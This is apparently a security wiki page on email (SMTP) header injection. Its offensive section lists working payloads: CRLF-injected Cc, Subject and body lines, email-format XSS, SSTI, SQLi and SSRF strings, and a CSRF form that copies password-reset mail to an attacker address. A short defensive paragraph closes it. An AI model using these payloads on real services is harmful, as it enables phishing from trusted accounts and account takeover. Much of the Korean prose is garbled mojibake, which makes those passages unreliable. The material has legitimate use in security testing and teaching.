Email Injection

SMTP Injection & Mail Injection

🔍 Introduction

Email Injection is an attack in which input received from a user is used by the application to process e-mail; when that input is insufficiently validated, an attacker can supply malicious parameter values to tamper with the mail's content and other fields.

{
    "email":"sender@domain.com%0ACc:attacker@domain.com"
}

๊ณต๊ฒฉ์ด ์„ฑ๊ณตํ•œ๋‹ค๋ฉด ๊ณต์‹ ๊ณ„์ • ์‚ฌ์นญ์ด๋‚˜ ํ”ผ์‹ฑ ๋“ฑ์— ํ™œ์šฉ๋  ์ˆ˜ ์žˆ๊ณ , ์—ฐ๊ด€๋œ ์‹œ์Šคํ…œ์— ๋”ฐ๋ผ์„œ ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์— ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

🗡 Offensive techniques

Detect

Every point where an e-mail is sent after a web request, such as invitations or notifications, can be affected by Email Injection.

POST /invite HTTP/1.1

email=hahwul@gmail.com

email ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํ†ตํ•ด ๋ฐ›์€ ๊ฐ’์ด SMTP ๋“ฑ ๋ฉ”์ผ ์ „์†ก ์‹œ์Šคํ…œ์„ ํ†ตํ•ด ์ „์†ก๋  ๋•Œ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ์—†๋‹ค๋ฉด CRLF(๊ฐœํ–‰๋ฌธ์ž)๋“ฑ์„ ์ด์šฉํ•˜์—ฌ Email์˜ ์†ก/์ˆ˜์‹ ์ธ, ๋‚ด์šฉ ๋“ฑ์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

POST /invite HTTP/1.1

email=hahwul@gmail.com%0ASubject:Fake%20Subject

Exploitation

Common Vuln

Type: Payload

  • XSS: test+(<script>alert(0)</script>)@example.com | test@example(<script>alert(0)</script>).com | "<script>alert(0)</script>"@example.com
  • SSTI: "<%= 7 * 7 %>"@example.com | test+(${{7*7}})@example.com
  • SQLi: "' OR 1=1 -- '"@example.com | "mail'); DROP TABLE users;--"@example.com
  • SSRF (Era of ssrf): john.doe@abc123.burpcollaborator.net | john.doe@[127.0.0.1]
  • Parameter pollution: victim&email=attacker@example.com
  • Email header injection: "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
  • Wildcard abuse: %@example.com

Refer: Various exploitation techniques using the E-mail format

Stealing sensitive information

Combined with vulnerabilities such as CSRF, it can be used to steal sensitive information such as the e-mail generated during a password reset or 2FA verification codes.

POST /invite HTTP/1.1

email=victim@domain.com%0ACc:attacker@domain.com

๋ฉ”์ผ์„ ๋ฐœ์ƒ์‹œํ‚ค๋Š” ์š”์ฒญ ์‹œ Email Injectionํ•˜์—ฌ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ์—๋„ Cc๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ ์ „๋‹ฌ๋  ์ˆ˜ ์žˆ๋„๋ก ๊ณต๊ฒฉ์ฝ”๋“œ๋ฅผ ๊ตฌ์„ฑํ•œ๋‹ค๋ฉด ํ”ผํ•ด์ž๊ฐ€ CSRF ์ฝ”๋“œ ์ ‘๊ทผ ์‹œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์žฌ์ƒ์„ฑ ๋งํฌ ๋“ฑ์„ ๊ณต๊ฒฉ์ž์˜ ๋ฉ”์ผ๋กœ๋„ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ์–ด ๊ณ„์ • ํƒˆ์ทจ ๋“ฑ์˜ ์ด์Šˆ์™€ ์—ฐ๊ฒฐ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<form action="https://weakness-service/findPassword" method="post">
    <input type="text" name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>

Header/Content Injection

Email Injection์ด ๊ฐ€๋Šฅํ•œ ๋ฉ”์ผ์ด noreply@blahblah ๋“ฑ ๊ณต์‹ ๊ณ„์ •์œผ๋กœ ์ „์†ก๋˜๋Š” ๊ฒฝ์šฐ mail์˜ ํ—ค๋”์— ๊ฐœํ–‰ ๋ฌธ์ž๋“ฑ์„ ์‚ฝ์ž…ํ•˜์—ฌ Subject, Body ๋“ฑ์„ ์กฐ์ž‘ํ•˜์—ฌ ๊ณต์‹ ๊ณ„์ •์—์„œ์˜ ํ”ผ์‹ฑ ๋ฉ”์ผ์„ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

POST /notify HTTP/1.1

email=victim@domain.com%0ASubject:Important%20Security%20Alerts%0A%0AFake%20Message!

In addition, when user input is inserted into the mail body, HTML tags, CSS and the like can be used to deliver mail the service did not intend.

POST /notify HTTP/1.1

email=victim@domain.com&name=alice<br>Please%20Click%20Me<!--

RCE

Mail ์ „์†ก์„ ์œ„ํ•ด์„œ Command-line์œผ๋กœ ๋‹ค๋ฅธ Mail Application์„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ๋Œ€ํ‘œ์ ์œผ๋กœ PHP Cli์˜ mail() ํ•จ์ˆ˜๋„ ๋น„์Šทํ•˜์ฃ .

In such cases, just as with Command Injection, if special characters are handled insufficiently during that process it can ultimately lead all the way to RCE.

Tricks

  • Subject: <TITLE>: the mail subject
  • Cc: <attacker mail address>: setting a Cc (carbon copy) lets the attacker receive the mail
  • Reply-To: <attacker mail address>: Reply-To designates the reply target, so replies to the mail can be collected

🛡 Defensive techniques

์‚ฌ์šฉ์ž๋กœ ๋ถ€ํ„ฐ Email ์ „์†ก์— ์‚ฌ์šฉ๋˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ๋ฐ›์•„ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ ์ง€์ •๋œ ํฌ๋งท์˜ ๋ฐ์ดํ„ฐ ์ด์™ธ์—๋Š” ์ฒ˜๋ฆฌํ•˜์ง€ ์•Š๋„๋ก ์ œํ•œํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค. ํŠนํžˆ ๊ฐœํ–‰๋ฌธ์ž์˜ ๊ฒฝ์šฐ ์—ฌ๋Ÿฌ๊ฐ€์ง€ Exploit ํฌ์ธํŠธ๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ผญ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

📌 References

  • https://en.wikipedia.org/wiki/Email_injection
  • https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
  • https://www.hahwul.com/cullinan/crlf-injection/#-defensive-techniques